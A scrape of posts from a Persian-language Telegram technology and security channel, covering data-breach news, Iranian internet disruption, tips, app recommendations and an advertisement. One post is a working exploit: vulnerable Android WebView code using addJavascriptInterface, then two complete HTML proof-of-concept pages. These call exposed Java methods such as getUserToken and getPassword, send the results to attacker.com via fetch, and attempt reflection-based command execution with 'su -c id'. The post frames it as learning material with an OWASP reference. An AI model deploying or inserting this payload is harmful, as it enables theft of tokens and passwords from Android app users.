افشای ۱۲۴ میلیون پسورد و ایمیل؛ آیا اطلاعات شما هم در خطر است؟
🔹بهتازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعهای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح میدهد که این دادهها در واقع مجموعهای از گزارشهای ثبتشده توسط بدافزارهای سرقتکننده اطلاعات هستند. این برنامههای مخرب روی سیستمعامل ویندوز و سایر دستگاهها پنهان میشوند و پسوردهای ذخیرهشده، دادههای مرورگر، کوکیها و توکنهای دسترسی را اسکن و سرقت میکنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، میتوانید به سادگی به وبسایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما میتوانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
🔹بهتازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعهای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح میدهد که این دادهها در واقع مجموعهای از گزارشهای ثبتشده توسط بدافزارهای سرقتکننده اطلاعات هستند. این برنامههای مخرب روی سیستمعامل ویندوز و سایر دستگاهها پنهان میشوند و پسوردهای ذخیرهشده، دادههای مرورگر، کوکیها و توکنهای دسترسی را اسکن و سرقت میکنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، میتوانید به سادگی به وبسایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما میتوانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
❤23👍5🥰4
چرا اینترنت ایران پس از بازگشایی همچنان ناپایدار است؟
🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بینالملل، کاربران همچنان با کندی، قطعیهای مکرر و اختلال در دسترسی به سرویسهای خارجی مواجهاند. بررسیهای فنی نشان میدهد مجموعهای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سختگیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بینالملل، کاربران همچنان با کندی، قطعیهای مکرر و اختلال در دسترسی به سرویسهای خارجی مواجهاند. بررسیهای فنی نشان میدهد مجموعهای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سختگیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
👍62❤9👎2
امارات متحده عربی با تصویب قانونی جدید، حداقل سن مجاز برای فعالیت در شبکههای اجتماعی را به ۱۵ سال افزایش داد
- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال میکند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حسابهای کاربری شخصی در شبکههای اجتماعی منع میکند.
- قانون مذکور همچنین دسترسی کاربران کمسنوسال به قابلیتهای کامل پلتفرمهای اجتماعی را محدود میسازد.
@ITSecurityComputer
- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال میکند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حسابهای کاربری شخصی در شبکههای اجتماعی منع میکند.
- قانون مذکور همچنین دسترسی کاربران کمسنوسال به قابلیتهای کامل پلتفرمهای اجتماعی را محدود میسازد.
@ITSecurityComputer
👍66❤30👏10🤬2🤣2🤔1
🛑هکرها به سراغ پروندههای پژوهشی Novo Nordisk رفتند؛ اطلاعات مطالعات بالینی در حمله سایبری سرقت شد
شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانههای داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کردهاند.
به گفته شرکت، دادههای سرقتشده شامل اطلاعات پژوهشی و برخی مشخصات شرکتکنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیتهای اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفتهاند.
این رخداد بار دیگر نشان میدهد دادههای پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شدهاند.
@ITSecurityComputer
شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانههای داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کردهاند.
به گفته شرکت، دادههای سرقتشده شامل اطلاعات پژوهشی و برخی مشخصات شرکتکنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیتهای اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفتهاند.
این رخداد بار دیگر نشان میدهد دادههای پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شدهاند.
@ITSecurityComputer
❤16👍6
خنده دار به نظر میاد ولی پرامپتش :
@ITSecurityComputer
«این تصاویر مربوط به میوههایی است که قصد خرید آنها را دارم. لطفاً بهصورت دقیق و حرفهای آنها را از نظر میزان رسیدگی، تازگی، شیرینی احتمالی، کیفیت ظاهری، لکهها، لهشدگی و نشانههای خراب بودن بررسی کن.
در نهایت:
بهترین گزینه برای خرید را مشخص کن
ترتیب کیفیت از بهترین تا ضعیفترین را بنویس
دلیل انتخابت را خیلی کوتاه و واضح توضیح بده
اگر هیچکدام مناسب نیستند، صادقانه بگو و دلیلش را توضیح بده
فرض کن یک کارشناس حرفهای انتخاب میوه هستی و باید بهترین انتخاب را برای یک خرید واقعی انجام بدهی.»
@ITSecurityComputer
🍓45🤣30👍14❤3
⭕️ در زیر یک تکه کد آسیبپذیر آورده شده است:
کد اکسپلویت کامل
نسخه سادهتر (سرقت دیتا از متود های اکسپوزد)
نکته: این POC فرض میکنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.
نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!
برای مطالعه بیشتر: Owasp MASTG
@ITSecurityComputer
WebView webview = new WebView(this);
WebSettings webSettings = webview.getSettings();
webSettings.setJavaScriptEnabled(true);
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
webView.loadUrl(getIntent().getStringExtra("url"));
کد اکسپلویت کامل
<!DOCTYPE html>
<html>
<head>
<title>POC - WebView addJavascriptInterface</title>
</head>
<body>
<h2> Exploiting addJavascriptInterface</h2>
<div id="result"></div>
<script>
// مرحله 1: سرقت دیتا از متدهای exposed
try {
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
document.getElementById('result').innerHTML +=
'<p>Stolen: ' + method + ' = ' + data + '</p>';
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
}
} catch(e) {}
}
} catch(e) {}
// مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)
try {
var context = window.Android.getContext();
var classLoader = context.getClassLoader();
var Runtime = classLoader.loadClass('java.lang.Runtime')
.getMethod('getRuntime', null)
.invoke(null, null);
Runtime.exec(['su', '-c', 'id']);
document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';
} catch(e) {
document.getElementById('result').innerHTML +=
'<p> RCE not possible (no chain method)</p>';
}
</script>
</body>
</html>
نسخه سادهتر (سرقت دیتا از متود های اکسپوزد)
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<script>
// سرقت دیتای هر متدی که در کلاس جاوا وجود داره
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
alert('Stolen: ' + data);
}
} catch(e) {}
}
</script>
</body>
</html>
نکته: این POC فرض میکنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.
نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!
برای مطالعه بیشتر: Owasp MASTG
@ITSecurityComputer
👾21❤4🤯3😱3
🔴 میدل ایست آی : از هوش مصنوعی گروک متعلق به ایلان ماسک برای مشخص کردن 2000 تارگت در حملات اخیر به ایران استفاده شده
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.
@ITSecurityComputer
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.
@ITSecurityComputer
🤬139🤣71😱10🫡5❤2🤷♂2👍2🔥2🐳2💯1💔1
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از این ویدیو 📈📈📈
اسپویل :با این ترفند هرچی حرف بزنی رو تایپ میکنه، رایگان بدون نصب هیچی
🪽 Fachlich
🍃 @ITSecurityComputer
اسپویل :
🪽 Fachlich
🍃 @ITSecurityComputer
🤣79❤7👍5
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از اینکه مشخص میشه اصلا برای تبدیل صدا به متن نیازی به گوشی نیست : 📉📉🫨
🪽 Fachlich
🍃 @ITSecurityComputer
🪽 Fachlich
🍃 @ITSecurityComputer
🤣77❤8
دیگه برای بستن برنامههای هنگ کرده، نیازی به Task Manager نداری حتماً برای شما هم پیش اومده که وسط کار، یه برنامه توی ویندوز قفل میکنه و هیچ جوره بسته نمیشه. همیشه مجبور بودیم کلی مسیر بریم، تسک منیجر رو باز کنیم و از اونجا برنامه رو به زور ببندیم (End\ Task). اما توی ویندوز ۱۱ یه قابلیت مخفی وجود داره که این دکمه رو مستقیم میاره روی نوار پایین صفحه (Taskbar) تا فقط با یک کلیک، برنامه ای هنگ کرده رو ببندید
چطوری فعالش کنیم؟
@ITSecurityComputer
چطوری فعالش کنیم؟
کلیدهای ترکیبی Windows + I رو بزنید تا تنظیمات (Settings) باز بشه.تمام حالا هر وقت برنامهای قفل کرد، کافیه روی آیکونش در پایین صفحه راستکلیک کنید و گزینهی End Task رو بزنید.
از منوی سمت چپ وارد بخش System بشید.
بیاید پایینتر و گزینهی For Developers (یا در برخی نسخهها Advanced) رو پیدا کنید.
گزینهی End Task رو روشن (On) کنید.
@ITSecurityComputer
❤31🤣10👍8❤🔥2
🔴 جوون ایرانی با بازی کردن GTA 6 خداحافظی کن.
راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.
@ITSecurityComputer
راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.
@ITSecurityComputer
💔156👾16🥱8❤7👎3😴2
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانشآموزی، تو بعضی از مناطق کشور سرعت اینترنت بهشدت ضعیف شده.
@ITSecurityComputer
@ITSecurityComputer
🤣158👍10😢5😍3👎2💔2❤1
تکنولوژی،خبری،هوش مصنوعی،
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانشآموزی، تو بعضی از مناطق کشور سرعت اینترنت بهشدت ضعیف شده. @ITSecurityComputer
البته ناگفته نماند که برقمونم رفت 😐😂
🤣92💔11👍4👎2🥰1
این اپ هم کاربردیه و میتونه به کارت بیاد میتونه برنامههای انتخابی رو فریز کنه تا دیگه در پسزمینه اجرا نشن. که نتیجه میشه :
برای اپهایی که کم استفاده میکنید، گزینه جالبیه تا منابع گوشی بیهوده مصرف نشن.
لینک دانلود از سایت رسمی
@ITSecurityComputer
رم آزادتر
گوشی خنکتر
عملکرد روانتر
مصرف باتری کمتر
کاهش مصرف اینترنت پسزمینه
رایگان و متنباز
بدون تبلیغات
برای اپهایی که کم استفاده میکنید، گزینه جالبیه تا منابع گوشی بیهوده مصرف نشن.
لینک دانلود از سایت رسمی
@ITSecurityComputer
👍19❤🔥3❤1
یک افزونه جالب برای صرفهجویی در وقت این افزونه سایتها رو محدود میکنه تا بیشتر از زمانی که تعیین کردی نتونی ازشون استفاده کنی. مثلاً میری یوتیوب فقط برای دیدن یه ویدیو اما یهو غرق میشی و چند ساعت میگذره این افزونه دقیقاً جلوشو میگیره
لینک نصب افزونه
@ITSecurityComputer
لینک نصب افزونه
@ITSecurityComputer
Google
Limit - Set Limits for Distracting Sites - Chrome Web Store
Limit your time spent on distracting sites. Limit is an extension that allows you to set time limits for distracting websites.
👍11❤2🤣2
🔻کابوس امنیت در اپل: این آسیبپذیری وصله نمیشود
🔹گروهی از محققان امنیتی یک کد مخرب عملیاتی با نام usbliter8 را منتشر کردهاند که به مهاجم اجازه میدهد کدهای دلخواه خود را در سطح SecureROM (حافظه اصلی بوت) تراشههای A12 و A13 اپل اجرا کند.
🔹 نکته نگرانکننده اینجاست که این کد امنیتی در مرحله ساخت تراشه در کارخانه درون سختافزار حک شده است؛ بنابراین هیچ بهروزرسانی نرمافزاری قادر به رفع آن نیست.
🔹البته خطر این حمله برای کاربران عادی، پایین است؛ چرا که مهاجم باید به صورت فیزیکی به دستگاه دسترسی داشته باشد و از ابزارهای خاصی استفاده کند. با این حال، در محیطهای حساس و سازمانی، این خبر به معنای یک زنگ خطر جدی است.
#آسیبپذیری #اپل
@ITSecurityComputer
🔹گروهی از محققان امنیتی یک کد مخرب عملیاتی با نام usbliter8 را منتشر کردهاند که به مهاجم اجازه میدهد کدهای دلخواه خود را در سطح SecureROM (حافظه اصلی بوت) تراشههای A12 و A13 اپل اجرا کند.
🔹 نکته نگرانکننده اینجاست که این کد امنیتی در مرحله ساخت تراشه در کارخانه درون سختافزار حک شده است؛ بنابراین هیچ بهروزرسانی نرمافزاری قادر به رفع آن نیست.
🔹البته خطر این حمله برای کاربران عادی، پایین است؛ چرا که مهاجم باید به صورت فیزیکی به دستگاه دسترسی داشته باشد و از ابزارهای خاصی استفاده کند. با این حال، در محیطهای حساس و سازمانی، این خبر به معنای یک زنگ خطر جدی است.
#آسیبپذیری #اپل
@ITSecurityComputer
🤣49❤11👍2😈1
Forwarded from آکادمی همراه
⏳ آخرین فرصت ثبتنام در دومین «بوتکمپ دواپس (DevOps)» آکادمی همراه اول
امروزه بسیاری از تیمهای فناوری به دنبال متخصصانی هستند که علاوه بر توسعه نرمافزار، توانایی استقرار، مدیریت و نگهداری سرویسها را نیز داشته باشند. دواپس (DevOps) یکی از مهارتهای کلیدی و پرتقاضای بازار کار است که این فاصله را از بین میبرد.
در این بوتکمپ ۱۲ هفتهای، با مفاهیم و ابزارهای اصلی دواپس بهصورت عملی آشنا میشوید و نحوه پیادهسازی و مدیریت زیرساختهای مدرن را یاد میگیرید.
💎 آموزش Docker، Kubernetes، CI/CD، Infrastructure as Code و مانیتورینگ سرویسها
💼 امکان کارآموزی در گروه همراه اول
🎓 همراه با گواهینامه آکادمی همراه اول
💳 امکان ثبتنام اقساطی
⚠️ ظرفیت محدود
اگر قصد دارید مسیر شغلی خود را در حوزه زیرساخت، کلاد و دواپس آغاز یا تقویت کنید، این آخرین فرصت ثبتنام در دوره است.
🌐 پیشثبتنام رایگان و مشاهده جزئیات:
🔗 https://l.hamrah.academy/991
⭐️ @Hamrah_Academy | آکادمی همراه اول
امروزه بسیاری از تیمهای فناوری به دنبال متخصصانی هستند که علاوه بر توسعه نرمافزار، توانایی استقرار، مدیریت و نگهداری سرویسها را نیز داشته باشند. دواپس (DevOps) یکی از مهارتهای کلیدی و پرتقاضای بازار کار است که این فاصله را از بین میبرد.
در این بوتکمپ ۱۲ هفتهای، با مفاهیم و ابزارهای اصلی دواپس بهصورت عملی آشنا میشوید و نحوه پیادهسازی و مدیریت زیرساختهای مدرن را یاد میگیرید.
💎 آموزش Docker، Kubernetes، CI/CD، Infrastructure as Code و مانیتورینگ سرویسها
💼 امکان کارآموزی در گروه همراه اول
🎓 همراه با گواهینامه آکادمی همراه اول
💳 امکان ثبتنام اقساطی
⚠️ ظرفیت محدود
اگر قصد دارید مسیر شغلی خود را در حوزه زیرساخت، کلاد و دواپس آغاز یا تقویت کنید، این آخرین فرصت ثبتنام در دوره است.
🌐 پیشثبتنام رایگان و مشاهده جزئیات:
🔗 https://l.hamrah.academy/991
⭐️ @Hamrah_Academy | آکادمی همراه اول
👎5❤3🤣1